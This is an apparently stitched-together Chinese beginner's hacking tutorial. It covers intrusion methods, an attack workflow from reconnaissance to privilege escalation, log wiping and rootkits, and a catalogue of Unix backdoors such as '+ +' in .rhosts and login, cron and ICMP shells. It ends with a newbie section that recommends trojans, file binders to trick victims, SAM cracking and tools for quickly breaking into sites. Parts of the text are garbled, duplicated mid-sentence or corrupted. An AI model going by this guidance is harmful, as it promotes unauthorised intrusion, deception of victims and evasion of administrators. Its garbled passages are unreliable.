1. 程式人生 > >黑客入門完整版教程

黑客入門完整版教程

看完的人10個有9個成了黑客
看完的人10個有9個成了黑客
還有一個是BC
然而看完的人
視力全下降1度
黑客的基本技能

1、黑客的精神態度是很重要的,但技術則更是重要。黑客的態度雖然是無可取代,隨著新科技的發明和舊技術的取代,這些工具隨時間在慢慢的改變。例如:以往總是會學會用機器碼寫程式,直到最近我們開始使用HTML。不過,在1996年末,當然,這是基礎的hacking技能。在1997年,理所當然的,你必須學會C。但,如果你只是學一種語言,那麼你不能算是一位黑客,了不起只能算是一個programmer。除此,你還必須學會學會以獨立於任何程式語言之上的概括性觀念來思考一件程式設計上的問題。要成為一位真正的黑客,你必須要能在幾天之內將manual內容和你目前己經知道的關連起學會一種新的語言。也就是說,你必會學還了C之外的東西,你至少還要會LISP或Perl(Java也正在努力的擠上這個名單; 譯者注: 我很懷疑這份名單)。除了幾個重要的hacking常用語言之外,這些語言提供你一些不同的程式設計途徑,並且讓你在好的方法中學習。

程式設計是一種複雜的技術,我沒辨法在這提供完整的學習步驟。但是我能告訴你一些在書本上和課堂上所沒有的東西(有很多,幾乎全部最好的黑客們都是自習而來的)。(a) 讀別人的程式碼;(寫程式,這兩項是不錯的方法。學習寫程式就像在學習寫一種良好的自然語言,最好的方法是去看一些專家們所寫的東西,然後寫一些你自己的東西,然後讀更多,再寫更多。然後一直持續,一直到你發展出一種屬於自己的風格和特色。要找到好的程式碼來看是很一件很困難的事,因為,對菜鳥黑客們而言,適於供他們閱讀和努力的大型程式的source數量很少。但這事己有了戲劇性的變化了; 現在免費的供應的軟體、程式設計工具和作業系統(大都公開提供 source,而且全都是由黑客們寫成的)到處可看。進入下一個主題。

2、取得一個免費的 UNIX,並學習使用和維護。我先假設你己經有一部個人電腦或者是可以使用任何一部(現在的小孩子真幸福,可如此輕易的擁有 :-))。取得黑客技巧的第一個步驟是取得一份Linux 或者一份免費的 BSD-Unix,並將它安裝在自己的機器,並使之順利的運作。沒錯,在這個世界上除了Unix之外,還有其它的作業系統。但是他們只提供bianry,你不能看到他們的程式碼,你也不能修改他們。想要在DOS或Windows或MacOS開始hacking,無疑就是要你綁著枷鎖跳舞一樣。

除此之外,Unix是Internet上的作業系統。當你在不懂Unix的情況下學習使用Internet時,你沒辨法在不懂Unix的情況下成為 Internet的黑客。因為這個原故,現在的黑客文化還是很牢固的以Unix為中心。(這並不完全是正確的,而且有些活在舊時代的黑客甚至也不喜歡這種情形,但是Unix和Internet之間的共生共成己經到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些,把Unix裝起來吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學習它,讓它運作起來,讓它陪你努力精進。用他向整個Internet喊話。看程式碼,改程式。

有一天你成為一位高竿的黑客,你回頭往後看時會發現,你得到比 Microsoft作業系統所能提供的還要好的程式設計工具(包括 C,Lisp和 Perl)。而且得到快樂,並學到比共生共成己經到了牢不可破的地步,即使是Microsoft的大塊肌肉也沒能在上面留下明顯的傷痕。) 因些,把Unix裝起來吧! (我自己是喜歡Linux,但是還有其它的東東可用。) 學習它,讓它運作起來,讓它陪你努力精進。用他向整個Internet喊話。看程式碼,改程式。有一天你成為一位高竿的黑客,你回頭往後看時會發現,你得到比Microsoft作業系統所能提供的還要好的程式設計工具(包括 C,Lisp和 Perl)。而且得到快樂,並
學到比你想像中的還要多的知識。關於學習Unix,在Loginataka有更多的資料。(http://www.ccil.org/~esr/faqs/loginataka。)
看一下Linux distribution的目錄或 Linux CD,並把自己交付給它。

3、學習使用World Wide Web並學會寫 HTML。
在黑客文化創造出來的東西,大多在他們的活動範圍外被使用著,如,在工廠和辨公室或大學被漠漠的使用著。但Web是一個很大的例外,這個黑客眼中的大玩具甚至還被政客們接受,並巧巧的在改變這個世界。因此(還有很多好的理由),你必須學習Web。並不只是學習使用browser(這太容易了)而己,還要學會寫HTML這個Web的標籤語言。如果你不知道如何設計程式,寫HTML也可以給一些習慣上的幫助。嗯!! 建立home page吧! 不過,有一個home page 並沒任何特別之處能讓你成為一位黑客。Web上到處都是home page,而且大部份都沒什麼重點,沒什麼內容的爛泥 – 很好看的爛泥巴,但是看起來都一樣,差不多。

4、至少學會以下的其中兩種:
一、網站伺服器程式ASP、PHP、CGI、jsP
我個人認為CGI是最難學的其中一種。
二、程式語言:C語言、C++、VB、JAVA、PERL、DELPHI、組合語言
不過我認為C語言的通用性最好,可以跨平臺(作業系統)使用。
還要試著自己寫程式、開發軟體等工作。
三、資料庫管理軟體:MYSQL、SQL、FOXPRO……等。
四、幾種常用的作業系統:WIN98、WIN2000、WINNT、WINXP、UNIX、LINUX、要是能學到UNIX那是最好不過的了。最最基本的WIN2K、WINNT也要學會吧。
如果以上的你都會了,那麼你已經是個高手了
黑客初級技術講解(上)

網路安全從其本質上來講就是網路上的資訊保安。從廣義來說,凡是涉及到網路上資訊的保密性、完整性、可用性、真實性和可控性的相關技術和理論都是網路安全的研究領域。確保網路系統的資訊保安是網路安全的目標,資訊保安包括兩個方面:資訊的儲存安全和資訊的傳輸安全。資訊的儲存安全是指資訊在靜態存放狀態下的安全,如是否會被非授權呼叫等。資訊的傳輸安全是指資訊在動態傳輸過程中安全。為了確保網路資訊的傳輸安全,有以下幾個問題:

  (1)對網路上資訊的監聽
  (2)對使用者身份的仿冒
  (3)對網路上資訊的篡改
  (4)對發出的資訊予以否認
  (5)對資訊進行重發

  對於一般的常用入侵方法主要有

  1.口令入侵

  所謂口令入侵,就是指用一些軟體解開已經得到但被人加密的口令文件,不過許多黑客已大量採用一種可以繞開或遮蔽口令保護的程式來完成這項工作。對於那些可以解開或遮蔽口令保護的程式通常被稱為“Crack”。由於這些軟體的廣為流傳,使得入侵電腦網路系統有時變得相當簡單,一般不需要很深入瞭解系統的內部結構,是初學者的好方法。

  2.特洛伊木馬術

  說到特洛伊木馬,只要知道這個故事的人就不難理解,它最典型的做法可能就是把一個能幫助黑客完成某一特定動作的程式依附在某一合法使用者的正常程式中,這時合法使用者的程式程式碼已被該變。一旦使用者觸發該程式,那麼依附在內的黑客指令程式碼同時被啟用,這些程式碼往往能完成黑客指定的任務。由於這種入侵法需要黑客有很好的程式設計經驗,且要更改程式碼、要一定的許可權,所以較難掌握。但正因為它的複雜性,一般的系統管理員很難發現。

  3.監聽法

  這是一個很實用但風險也很大的黑客入侵方法,但還是有很多入侵系統的黑客採用此類方法,正所謂藝高人膽大。

  網路節點或工作站之間的交流是通過資訊流的轉送得以實現,而當在一個沒有集線器的網路中,資料的傳輸並沒有指明特定的方向,這時每一個網路節點或工作站都是一個介面。這就好比某一節點說:“嗨!你們中有誰是我要發信息的工作站。”

  此時,所有的系統介面都收到了這個資訊,一旦某個工作站說:“嗨!那是我,請把資料傳過來。”聯接就馬上完成。

  目前有網路上流傳著很多嗅探軟體,利用這些軟體就可以很簡單的監聽到資料,甚至就包含口令檔案,有的服務在傳輸檔案中直接使用明文傳輸,這也是非常危險的
4.E-mail技術

  使用email加木馬程式這是黑客經常使用的一種手段,而且非常奏效,一般的使用者,甚至是網管,對網路安全的意識太過於淡薄,這就給很多黑客以可乘之機。

  5.病毒技術
  作為一個黑客,如此使用應該是一件可恥的事情,不過大家可以學習,畢竟也是一種攻擊的辦法,特殊時間,特殊地點完全可以使用。

  6.隱藏技術

  網路攻擊的一般步驟及例項

  攻擊的準備階段

  首先需要說明的是,入侵者的來源有兩種,一種是內部人員利用自己的工作機會和許可權來獲取不應該獲取的許可權而進行的攻擊。另一種是外部人員入侵,包括遠端入侵、網路節點接入入侵等。本節主要討論遠端攻擊。

  進行網路攻擊是一件系統性很強的工作,其主要工作流程是:收集情報,遠端攻擊,遠端登入,取得普通使用者的許可權,取得超級使用者的許可權,留下後門,清除日誌。主要內容包括目標分析,文件獲取,破解密碼,日誌清除等技術,下面分別介紹。

  1.確定攻擊的目的

  攻擊者在進行一次完整的攻擊之前首先要確定攻擊要達到什麼樣的目的,即給對方造成什麼樣的後果。常見的攻擊目的有破壞型和入侵型兩種。破壞型攻擊指的只是破壞攻擊目標,使其不能正常工作,而不能隨意控制目標的系統的執行。要達到破壞型攻擊的目的,主要的手段是拒絕服務攻擊(Denial Of Service)。另一類常見的攻擊目的是入侵攻擊目標,這種攻擊是要獲得一定的許可權來達到控制攻擊目標的目的。應該說這種攻擊比破壞型攻擊更為普遍,威脅性也更大。因為黑客一旦獲取攻擊目標的管理員許可權就可以對此伺服器做任意動作,包括破壞性的攻擊。此類攻擊一般也是利用伺服器作業系統、應用軟體或者網路協議存在的漏洞進行的。當然還有另一種造成此種攻擊的原因就是密碼洩露,攻擊者靠猜測或者窮舉法來得到伺服器使用者的密碼,然後就可以用和真正的管理員一樣對伺服器進行訪問。

  2.資訊收集

  除了確定攻擊目的之外,攻擊前的最主要工作就是收集儘量多的關於攻擊目標的資訊。這些資訊主要包括目標的作業系統型別及版本,目標提供哪些服務,各伺服器程式的型別與版本以及相關的社會資訊。

  要攻擊一臺機器,首先要確定它上面正在執行的作業系統是什麼,因為對於不同型別的作業系統,其上的系統漏洞有很大區別,所以攻擊的方法也完全不同,甚至同一種作業系統的不同版本的系統漏洞也是不一樣的。要確定一臺伺服器的作業系統一般是靠經驗,有些伺服器的某些服務顯示資訊會洩露其作業系統。例如當我們通過TELNET連上一臺機器時,如果顯示

  Unix(r)System V Release 4.0
  login:

  那麼根據經驗就可以確定這個機器上執行的作業系統為SUN OS 5.5或5.5.l。但這樣確定作業系統型別是不準確的,因為有些網站管理員為了迷惑攻擊者會故意更改顯示資訊,造成假象。
還有一種不是很有效的方法,諸如查詢DNS的主機資訊(不是很可靠)來看登記域名時的申請機器型別和作業系統型別,或者使用社會工程學的方法來獲得,以及利用某些主機開放的SNMP的公共組來查詢。

  另外一種相對比較準確的方法是利用網路作業系統裡的TCP/IP堆疊作為特殊的“指紋”來確定系統的真正身份。因為不同的作業系統在網路底層協議的各種實現細節上略有不同。可以通過遠端向目標傳送特殊的包,然後通過返回的包來確定作業系統型別。例如通過向目標機發送一個FIN的包(或者是任何沒有ACK 或SYN標記的包)到目標主機的一個開放的埠然後等待迴應。許多系統如windows、 BSDI、 CISCO、 HP/UX和 IRIX會返回一個RESET。通過傳送一個SYN包,它含有沒有定義的TCP標記的TCP頭。那麼在Linux系統的迴應包就會包含這個沒有定義的標記,而在一些別的系統則會在收到SYN+BOGU包之後關閉連線。或是利用尋找初始化序列長度模板與特定的作業系統相匹配的方法。利用它可以對許多系統分類,如較早的Unix系統是64K長度,一些新的Unix系統的長度則是隨機增長。還有就是檢查返回包裡包含的視窗長度,這項技術根據各個作業系統的不同的初始化視窗大小來唯一確定它們。利用這種技術實現的工具很多,比較著名的有NMAP、CHECKOS、QUESO等。

  獲知目標提供哪些服務及各服務daemon的型別、版本同樣非常重要,因為已知的漏洞一般都是對某一服務的。這裡說的提供服務就是指通常我們提到的喘口,例如一般 TELNET在23埠,FTP在對21埠,WWW在80埠或8080埠,這只是一般情況,網站管理完全可以按自己的意願修改服務所監聽的埠號。在不同伺服器上提供同一種服務的軟體也可以是不同,我們管這種軟體叫做daemon,例如同樣是提供FTP服務,可以使用wuftp、proftp, ncftp等許多不同種類的daemon。確定daemon的型別版本也有助於黑客利用系統漏洞攻破網站。

  另外需要獲得的關於系統的資訊就是一些與計算機本身沒有關係的社會資訊,例如網站所屬公司的名稱、規模,網路管理員的生活習慣、電話號碼等。這些資訊看起來與攻擊一個網站沒有關係,實際上很多黑客都是利用了這類資訊攻破網站的。例如有些網站管理員用自己的電話號碼做系統密碼,如果掌握了該電話號碼,就等於掌握了管理員許可權進行資訊收集可以用手工進行,也可以利用工具來完成,完成資訊收集的工具叫做掃描器。用掃描器收集資訊的優點是速度快,可以一次對多個目標進行掃描。

  攻擊的實施階段

  1.獲得許可權

  當收集到足夠的資訊之後,攻擊者就要開始實施攻擊行動了。作為破壞性攻擊,只需利用工具發動攻擊即可。而作為入侵性攻擊,往往要利用收集到的資訊,找到其系統漏洞,然後利用該漏洞獲取一定的許可權。有時獲得了一般使用者的許可權就足以達到修改主頁等目的了,但作為一次完整的攻擊是要獲得系統最高許可權的,這不僅是為了達到一定的目的,更重要的是證明攻擊者的能力,這也符合黑客的追求。

  能夠被攻擊者所利用的漏洞不僅包括系統軟體設計上的安全漏洞,也包括由於管理配置不當而造成的漏洞。前不久,因特網上應用最普及的著名www伺服器提供商Apache的主頁被黑客攻破,其主頁面上的 Powered by Apache圖樣(羽毛狀的圖畫)被改成了Powered by Microsoft Backoffice的圖樣,那個攻擊者就是利用了管理員對Webserver用資料庫的一些不當配置而成功取得最高許可權的。
黑客初級技術講解(中)

  當然大多數攻擊成功的範例還是利用了系統軟體本身的漏洞。造成軟體漏洞的主要原因在於編制該軟體的程式設計師缺乏安全意識。當攻擊者對軟體進行非正常的呼叫請求時造成緩衝區溢位或者對檔案的非法訪問。其中利用緩衝區溢位進行的攻擊最為普遍,據統計80%以上成功的攻擊都是利用了緩衝區溢位漏洞來獲得非法許可權的。關於緩衝區溢位在後面用專門章節來作詳細解釋。

  無論作為一個黑客還是一個網路管理員,都需要掌握儘量多的系統漏洞。黑客需要用它來完成攻擊,而管理員需要根據不同的漏洞來進行不同的防禦措施。瞭解最新最多的漏洞資訊,可以到諸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等網站去查詢。

  2.許可權的擴大

  系統漏洞分為遠端漏洞和本地漏洞兩種,遠端漏洞是指黑客可以在別的機器上直接利用該漏洞進行攻擊並獲取一定的許可權。這種漏洞的威脅性相當大,黑客的攻擊一般都是從遠端漏洞開始的。但是利用遠端漏洞獲取的不一定是最高許可權,而往往只是一個普通使用者的許可權,這樣常常沒有辦法做黑客們想要做的事。這時就需要配合本地漏洞來把獲得的許可權進行擴大,常常是擴大至系統的管理員許可權。
只有獲得了最高的管理員許可權之後,才可以做諸如網路監聽、打掃痕跡之類的事情。要完成許可權的擴大,不但可以利用已獲得的許可權在系統上執行利用本地漏洞的程式,還可以放一些木馬之類的欺騙程式來套取管理員密碼,這種木馬是放在本地套取最高許可權用的,而不能進行遠端控制。例如一個黑客已經在一臺機器上獲得了一個普通使用者的賬號和登入許可權,那麼他就可以在這臺機器上放置一個假的su 程式。一旦黑客放置了假su程式,當真正的合法使用者登入時,運行了su,並輸入了密碼,這時root密碼就會被記錄下來,下次黑客再登入時就可以使用su 變成root了。

  攻擊的善後工作

  1.日誌系統簡介

  如果攻擊者完成攻擊後就立刻離開系統而不做任何善後工作,那麼他的行蹤將很快被系統管理員發現,因為所有的網路作業系統一般都提供日誌記錄功能,會把系統上發生的動作記錄下來。所以,為了自身的隱蔽性,黑客一般都會抹掉自己在日誌中留下的痕跡。想要了解黑客抹掉痕跡的方法,首先要了解常見的作業系統的日誌結構以及工作方式。Unix的日誌檔案通常放在下面這幾個位置,根據作業系統的不同略有變化

  /usr/adm——早期版本的Unix。
  /Var/adm新一點的版本使用這個位置。
  /Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用這個位置。
  /etc,大多數Unix版本把Utmp放在此處,一些Unix版本也把Wtmp放在這裡,這也是Syslog.conf的位置。

  下面的檔案可能會根據你所在的目錄不同而不同:

  acct或pacct-一記錄每個使用者使用的命令記錄。
  accesslog主要用來伺服器運行了NCSA HTTP伺服器,這個記錄檔案會記錄有什麼站點連線過你的伺服器。
  aculo儲存撥出去的Modems記錄。
  lastlog記錄了最近的Login記錄和每個使用者的最初目的地,有時是最後不成功Login的記錄。
  loginlog一記錄一些不正常的L0gin記錄。
  messages——記錄輸出到系統控制檯的記錄,另外的資訊由Syslog來生成
  security記錄一些使用 UUCP系統企圖進入限制範圍的事例。
  sulog記錄使用su命令的記錄。
  utmp記錄當前登入到系統中的所有使用者,這個檔案伴隨著使用者進入和離開系統而不斷變化。
  Utmpx,utmp的擴充套件。
  wtmp記錄使用者登入和退出事件。
  Syslog最重要的日誌檔案,使用syslogd守護程式來獲得。

  2.隱藏蹤跡

  攻擊者在獲得系統最高管理員許可權之後就可以隨意修改系統上的檔案了(只對常規 Unix系統而言),包括日誌檔案,所以一般黑客想要隱藏自己的蹤跡的話,就會對日誌進行修改。最簡單的方法當然就是刪除日誌檔案了,但這樣做雖然避免了系統管理員根據IP追蹤到自己,但也明確無誤地告訴了管理員,系統己經被人侵了。所以最常用的辦法是隻對日誌檔案中有關自己的那一部分做修改。關於修改方法的具體細節根據不同的作業系統有所區別,網路上有許多此類功能的程式,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日誌檔案中某一使用者的資訊,使得當使用w、who、last等命令檢視日誌檔案時,隱藏掉此使用者的資訊。
管理員想要避免日誌系統被黑客修改,應該採取一定的措施,例如用印表機實時記錄網路日誌資訊。但這樣做也有弊端,黑客一旦瞭解到你的做法就會不停地向日志裡寫入無用的資訊,使得印表機不停地列印日誌,直到所有的紙用光為止。所以比較好的避免日誌被修改的辦法是把所有日誌檔案傳送到一臺比較安全的主機上,即使用loghost。即使是這樣也不能完全避免日誌被修改的可能性,因為黑客既然能攻入這臺主機,也很可能攻入loghost。

  只修改日誌是不夠的,因為百密必有一漏,即使自認為修改了所有的日誌,仍然會留下一些蛛絲馬跡的。例如安裝了某些後門程式,執行後也可能被管理員發現。所以,黑客高手可以通過替換一些系統程式的方法來進一步隱藏蹤跡。這種用來替換正常系統程式的黑客程式叫做rootkit,這類程式在一些黑客網站可以找到,比較常見的有 LinuxRootKit,現在已經發展到了5.0版本了。它可以替換系統的ls、ps、netstat、inetd等等一系列重要的系統程式,當替換了 ls後,就可以隱藏指定的檔案,使得管理員在使用ls命令時無法看到這些檔案,從而達到隱藏自己的目的。

  3.後門

  一般黑客都會在攻入系統後不只一次地進入該系統。為了下次再進入系統時方便一點,黑客會留下一個後門,特洛伊木馬就是後門的最好範例。Unix中留後門的方法有很多種,下面介紹幾種常見的後門,供網路管理員參考防範。

  <1>密碼破解後門
  這是入侵者使用的最早也是最老的方法,它不僅可以獲得對Unix機器的訪問,而且可以通過破解密碼製造後門。這就是破解口令薄弱的帳號。以後即使管理員封了入侵者的當前帳號,這些新的帳號仍然可能是重新侵入的後門。多數情況下,入侵者尋找口令薄弱的未使用帳號,然後將口令改的難些。當管理員尋找口令薄弱的帳號是,也不會發現這些密碼已修改的帳號。因而管理員很難確定查封哪個帳號。

  <2>Rhosts + + 後門
  在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts檔案裡的主機名使用簡單的認證方法。使用者可以輕易的改變設定而不需口令就能進入。入侵者只要向可以訪問的某使用者的rhosts檔案中輸入”+ +”,就可以允許任何人從任何地方無須口令便能進入這個帳號。特別當home目錄通過NFS向外共享時,入侵者更熱中於此。這些帳號也成了入侵者再次侵入的後門。許多人更喜歡使用Rsh,因為它通常缺少日誌能力. 許多管理員經常檢查 “+ +”,所以入侵者實際上多設定來自網上的另一個帳號的主機名和 使用者名稱,從而不易被發現。

  <3>校驗和及時間戳後門
  早期,許多入侵者用自己的trojan程式替代二進位制檔案。系統管理員便依@@時間戳和系統校驗和的程式辨別一個二進位制檔案是否已被改變,如Unix裡的sum程式。入侵者又發展了使trojan檔案和原檔案時間戳同步的新技術。它是這樣實現的: 先將系統時鐘撥回到原檔案時間,然後調整trojan檔案的時間為系統時間。一旦二進位制trojan檔案與原來的精確同步,就可以把系統時間設回當前時間。Sum程式是基於CRC校驗,很容易騙過。入侵者設計出了可以將trojan的校驗和調整到原檔案的校驗和的程式。MD5是被大多數人推薦的,MD5使用的演算法目前還沒人能騙過。
黑客初級技術講解(下)

  <4>Login後門
  在Unix裡,login程式通常用來對 telnet來的使用者進行口令驗證. 入侵者獲取login.c的原始碼並修改,使它在比較輸入口令與儲存口令時先檢查後門口令。如果使用者敲入後門口令,它將忽視管理員設定的口令讓你長驅直入。這將允許入侵者進入任何帳號,甚至是root。由於後門口令是在使用者真實登入並被日誌記錄到utmp和wtmp前產生一個訪問的,所以入侵者可以登入獲取shell卻不會暴露該帳號。管理員注意到這種後門後,便用”strings”命令搜尋login程式以尋找文字資訊. 許多情況下後門口令會原形畢露。入侵者就開始加密或者更好的隱藏口令,使strings命令失效<5>Telnetd後門
  當用戶telnet到系統,監聽埠的inetd服務接受連線隨後遞給in.telnetd,由它執行 login.一些入侵者知道管理員會檢查login是否被修改,就著手修改in.telnetd. 在in.telnetd內部有一些對使用者資訊的檢驗,比如使用者使用了何種終端. 典型的終端設定是Xterm或者VT100.入侵者可以做這樣的後門,當終端設定為”letmein”時產生一 個不要任何驗證的shell. 入侵者已對某些服務作了後門,對來自特定源埠的連線產 生一個shell。

  <6>服務後門
  幾乎所有網路服務曾被入侵者作過後門. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本隨處多是。有的只是連線到某個TCP埠的shell,通過後門口令就能獲取訪問。這些程式有時用刺媧□?Ucp這樣不用的服務,或者被加入inetd.conf 作為一個新的服務,管理員應該非常注意那些服務正在執行,並用MD5對原服務程式做校驗。

  <7>Cronjob後門
  Unix上的Cronjob可以按時間表排程特定程式的執行。入侵者可以加入後門shell程式使它在1AM到2AM之間執行,那麼每晚有一個小時可以獲得訪問。也可以檢視cronjob中經常執行的合法程式,同時置入後門。

  <8>庫後門
  幾乎所有的UNIX系統使用共享庫,共享庫用於相同函式的重用而減少程式碼長度。一些入侵者在象crypt.c和_crypt.c這些函式裡作了後門;象 login.c這樣的程式呼叫了 crypt()。當使用後門口令時產生一個shell。因此,即使管理員用MD5檢查login程式,仍然能產生一個後門函式,而且許多管理員並不會檢查庫是否被做了後門。對於許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗,有一種辦法是入侵者對open()和檔案訪問函式做後門。後門函式讀原檔案但執行trojan後門程式。所以當MD5讀這些檔案時,校驗和一切正常,但當系統執行時將執行trojan版本的,即使trojan庫本身也可躲過MD5校驗,對於管理員來說有一種方法可以找到後門,就是靜態編連MD5校驗程式然後執行,靜態連線程式不會使用trojan共享庫。

  <9>核心後門
  核心是Unix工作的核心,用於庫躲過MD5校驗的方法同樣適用於核心級別,甚至連靜態 連線多不能識別. 一個後門作的很好的核心是最難被管理員查詢的,所幸的是核心的 後門程式還不是隨手可得,每人知道它事實上傳播有多廣。

 <10>檔案系統後門
  入侵者需要在伺服器上儲存他們的掠奪品或資料,並不能被管理員發現,入侵者的文章常是包括exploit指令碼工具,後門集,sniffer日誌, email的備分,原始碼,等等!有時為了防止管理員發現這麼大的檔案,入侵者需要修補”ls”,”du”,”fsck”以隱匿特定的目錄和檔案,在很低的級別,入侵者做這樣的漏洞: 以專有的格式在硬碟上割出一部分,且表示為壞的扇區。因此入侵者只能用特別的工具訪問這些隱藏的檔案,對於普通的管理員來說,很難發現這些”壞扇區”裡的檔案系統,而它又確實存在。

  <11>Boot塊後門
  在PC世界裡,許多病毒藏匿與根區,而殺病毒軟體就是檢查根區是否被改變。Unix下,多數管理員沒有檢查根區的軟體,所以一些入侵者將一些後門留在根區。
. 所以更多的管理員是 用MD5校驗和檢測這種後門的。
<12>隱匿程序後門
  入侵者通常想隱匿他們執行的程式,這樣的程式一般是口令破解程式和監聽程式 (sniffer),有許多辦法可以實現,這裡是較通用的: 編寫程式時修改自己的argv[] 使它看起來象其他程序名。可以將sniffer程式改名類似in.syslog再執行,因此當管理員用”ps”檢查執行程序時,出現的是標準服務名。可以修改庫函式致使 “ps”不能顯示所有程序,可以將一個後門或程式嵌入中斷驅動程式使它不會在程序表顯現。使用這個技術的一個後門例子是

  amod.tar.gz :
  http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html網路通行. 這些網路通行後 門有時允許入侵者通過防火牆進行訪問。有許多網路後門程式允許入侵者建立某個端 口號並不用通過普通服務就能實現訪問. 因為這是通過非標準網路埠的通行,管理 員可能忽視入侵者的足跡. 這種後門通常使用TCP,UDP和ICMP,但也可能是其他型別報文。

  <14>TCP Shell 後門
  入侵者可能在防火牆沒有阻塞的高位TCP埠建立這些TCP Shell後門. 許多情況下,他們用口令進行保護以免管理員連線上後立即看到是shell訪問. 管理員可以用netstat 命令檢視當前的連線狀態,那些埠在偵聽,目前連線的來龍去脈. 通常這些後門可 以讓入侵者躲過TCP Wrapper技術. 這些後門可以放在SMTP埠,許多防火牆允許 e-mail通行的.

  <15>UDP Shell 後門
  管理員經常注意TCP連線並觀察其怪異情況,而UDP Shell後門沒有這樣的連線,所以 netstat不能顯示入侵者的訪問痕跡,許多防火牆設定成允許類似DNS的UDP報文的通行,通常入侵者將UDP Shell放置在這個埠,允許穿越防火牆。

  <16>ICMP Shell 後門
  Ping是通過傳送和接受ICMP包檢測機器活動狀態的通用辦法之一。許多防火牆允許外界ping它內部的機器,入侵者可以放資料入Ping的ICMP 包,在ping的機器間形成一個shell通道,管理員也許會注意到Ping包暴風,但除了他檢視包內資料,否者入侵者不會暴露。

  <17>加密連線
  管理員可能建立一個sniffer試圖某個訪問的資料,但當入侵者給網路通行後門加密後,就不可能被判定兩臺機器間的傳輸內容了。

基礎知識(1)

我認為這是一套適合初學者由淺到深的文章,所以強烈推薦給大家,作者從基礎講到最近比較火的漏洞,可能有些人看來是淺了些,但是的確很適合想幹點啥但又不知道怎麼辦的菜鳥們。

第一節,伸展運動。這節操我們要準備道具,俗話說:“工欲善其事,必先利其器”(是這樣嗎?哎!文化低……)說得有道理,我們要學習黑客技術,一點必要的工具必不可少。

1,一臺屬於自己的可以上網的電腦。這樣你可以有充分的支配權,上網不用說,否則你怎麼看到我的文章?wap?呵呵!屬於自己很重要,否則安全性是個很大的問題。第一點相信大家沒有問題。

2, windows2000/nt,別和我說98/me,他們是你們同學用來玩遊戲的!(當然,我也是鐵桿game fan)對網路支援極差,命令受限制,很多軟體又不能用,對黑客來說使用起來絆手絆腳,非常不利。這裡我推薦2000,這是一個很成熟的系統(漏洞還是有一堆)。推薦雙系統,這樣黑玩搭配,幹活不累。

3,冰河。中國第一木馬,中者數不勝數,國人驕傲。雖然用冰河根本不能算黑客,但它確實能培養你對黑客的興趣,同時幫助你瞭解網路,相信很多黑客同學都是這樣起步的。靜止寫的那篇冰河教程很不錯,大家仔細看看。而且,以後你學會入侵伺服器後,用冰河操作也會減少工作量(我是懶蟲,爽!)

4,oicq。我們學黑客,可不是學泡mm!bfctx你………… 息怒息怒!我們當然是學黑客,但不要忘了,眾人拾柴火更高,我們通過cshu的成員列表,互相聯絡幫助,對提高水平很有幫助!另外我要廢話一句:據我瞭解,現在黑客網站下載最多的都是針對oicq的破解工具,我個人認為很無聊,偷個密碼代表什麼,浪費時間!最後補充:mm不能不泡。(誰砸我??!!)

5,superscan。很好用的埠掃描器,速度超快,功能一流,一旦擁有,別無所求……(打住!)不論是找木馬受害者,還是掃伺服器埠,它都非常有效,cshu強烈推薦!

6,一本筆記本/便條,網上資料相當多,黑客處理的也是非常之多。良好的習慣決定了你的效率,準備一本筆記本,記錄下你的成果,肉雞,木馬利用,命令,密碼……堅持一下,你會發現你的效率大幅上升的!

7,lc3.著名nt/2000sam破解程式,有時我們拿不到足夠許可權,又沒好辦法,那麼lc3是最好的解決辦法,只要你拿的到sam,你就是伺服器它爺爺!本站有其破解程式,支援了暴力破解!

8,程式合併。這是玩木馬必需的,雖然木馬是很低的手段,但有時配合巧辦法(以後我會介紹)確實能夠達到意想不到的效果,朋友們可以在空閒時玩玩木馬,很有趣,若你能巧妙的騙過mm,那麼webmaster也可能被你騙倒:〉(比較理想化)

9,流光4for 2000/nt。可能是世界上最好的綜合類黑軟!中國的驕傲,它集成了很全的漏洞資訊,速度快,方法多,對有漏洞的主機是毀滅性的打擊,操作又方便,是快速黑站必不可少的精品工具。超級吐血推薦!!

10,良好的心態,穩定的情緒,刻苦鑽研的精神,刨根問底的作風,打掃房間的習慣。黑客是門很高深的學問,不要幻想一步登天,失敗是常有的事,千萬不可灰心。在那麼多黑軟的包圍下,切不可完全依賴他們,一定要了解它們利用什麼原理工作。對任何一個小問題,小細節,一定要問清楚,cshu就是給大家互相交流的場所哦!黑完後不要得意忘形,打掃戰場也很重要,以防萬一。

第一節操完,可能很無聊,我就這點水平,大家見諒!這裡我說一句大話:做完菜鳥操,包你會黑簡單的站(哎喲!心慌了!)

下一節操我們要介紹如何掌握一臺主機的基本資訊,期待中……

真是太對不起大家了,隔了那麼久才寫這篇教程,我這幾天實在太忙,大家還是體諒一下我吧,好了,開始做操。

今天的內容是獲得主機的資訊。 我們要黑一臺主機,首先要了解它的資訊,包括它的型別,使用者列表,目錄,埠,漏洞等等。

首先我們我們要找一臺主機來練手,隨便挑吧!www.flyingfish.com(亂說的)

第一部,呵呵,先在ie裡看看吧,mmmm…..做的還行,挺精緻的!主要是我們肯定了它現在是正常的。然後,我們應該知道它的ip,很簡單,ping它一下就可以了。

ping www.flyingfish.com,看看窗口裡有了什麼?是不是有三行迴應,其中的111.111.222.222就是ip了(還是胡說的,一個例子)。有人是不是要問,我這裡怎麼沒有。那可能是兩個原因,第一,你打錯命令了;第二,該主機裝了防火牆,禁止ping,不過這種可能很小。

知道了ip,下一步應該確定埠了。下面是一些常用的埠的預設值

21–ftp 重要哦

23–telnet 歡呼吧

25-smtp 儘管重要,但似乎沒什麼可利用的

53–domain 同上

79–finger 可知道使用者資訊了

80–http 要看網頁,沒它不行吧

110–pop 收信的

139–netbios 共享用的,很有利用價值哦

3389–win2000超級終端 呵呵,這個好!

其實埠有上千種,這些最最常用

我們怎麼知道伺服器有什麼埠開啟呢??去找個掃描器吧,x-scan ,super scan,flux等等很多哦。這裡我推薦super scan ,速度很快,本站也有其教程哦!用法還是比較傻瓜的,估計大家不會有問題,輕輕幾點,開啟的埠就出現了。不錯不錯,上面說到的都有(太理想化了吧!)

那麼我們該如何應對呢?

